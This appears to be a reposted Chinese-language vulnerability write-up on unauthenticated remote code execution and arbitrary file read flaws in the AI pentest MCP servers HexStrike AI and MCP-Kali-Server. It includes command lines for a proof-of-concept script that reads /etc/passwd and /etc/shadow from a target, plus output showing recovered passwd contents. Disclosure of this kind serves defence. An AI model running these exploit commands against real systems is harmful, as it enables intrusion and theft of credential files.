文章总结: 文档披露HexStrikeAIv6.0存在严重预认证远程代码执行漏洞,其中/api/command端点未授权即可通过subprocess.run执行任意系统命令。报告详细分析了5个RCE漏洞点及MCP协议攻击链,确认攻击者能以kali用户权限获得系统控制权。建议立即添加认证、禁用调试接口、使用白名单替代shell执行命令。 综合评分: 85 文章分类: 漏洞分析,渗透测试,安全工具,应急响应,WEB安全
十、Kali MCP 多个RCE 0day漏洞
发现它和hexstrike代码差不多,存在完全一致漏洞点,时间有点久,我已记不起它俩,谁先开发的 肯定有一个是基于另一个代码修改的,只是一个MCP工具多,一个少而已,但是都一样的危险,哈哈
python mks_arbitrary_file_read_poc.py -t http://192.168.18.10:5000 -f /etc/passwd -m nmap
基本用法
python mks_arbitrary_file_read_poc.py -t http://192.168.18.10:5000 -f /etc/passwd
指定 nmap 向量并落盘
python mks_arbitrary_file_read_poc.py -t http://TARGET:5000 -f /etc/group -m nmap -o group.txt
全向量尝试
python mks_arbitrary_file_read_poc.py -t http://TARGET:5000 -f /etc/os-release --all
调试模式(输出原始 HTTP 响应)
python mks_arbitrary_file_read_poc.py -t http://TARGET:5000 -f /etc/shadow -m nmap --raw
任意文件读取漏洞
__ __ _ __ ___ _ ___ ___ ___ ___ ___
| \/ | |/ // __|_____ | | | __| _ \ | _ \/ _ \ / __|
| |\/| | ' < \__ \_____|| |__| _|| / | _/ (_) | (__
|_| |_|_|\_\|___/ |____|_| |_|_\ |_| \___/ \___|
MCP-Kali-Server :: Unauthenticated Arbitrary File Read
[*] Target : http://192.168.18.10:5000
[*] File : /etc/passwd
[*] Vector: nmap -iL
[+] nmap: recovered 3277 bytes in 13.83s
------------------------------------------------------------
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
十一、AI生成的EXP脚本
image
免责声明
使用EXP请遵循相关法律法规,确保在授权的环境中进行测试和使用。
本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:K8实验室 k8gege k8gege《AI渗透工具 Kali & HexStrike 大量RCE 0day漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论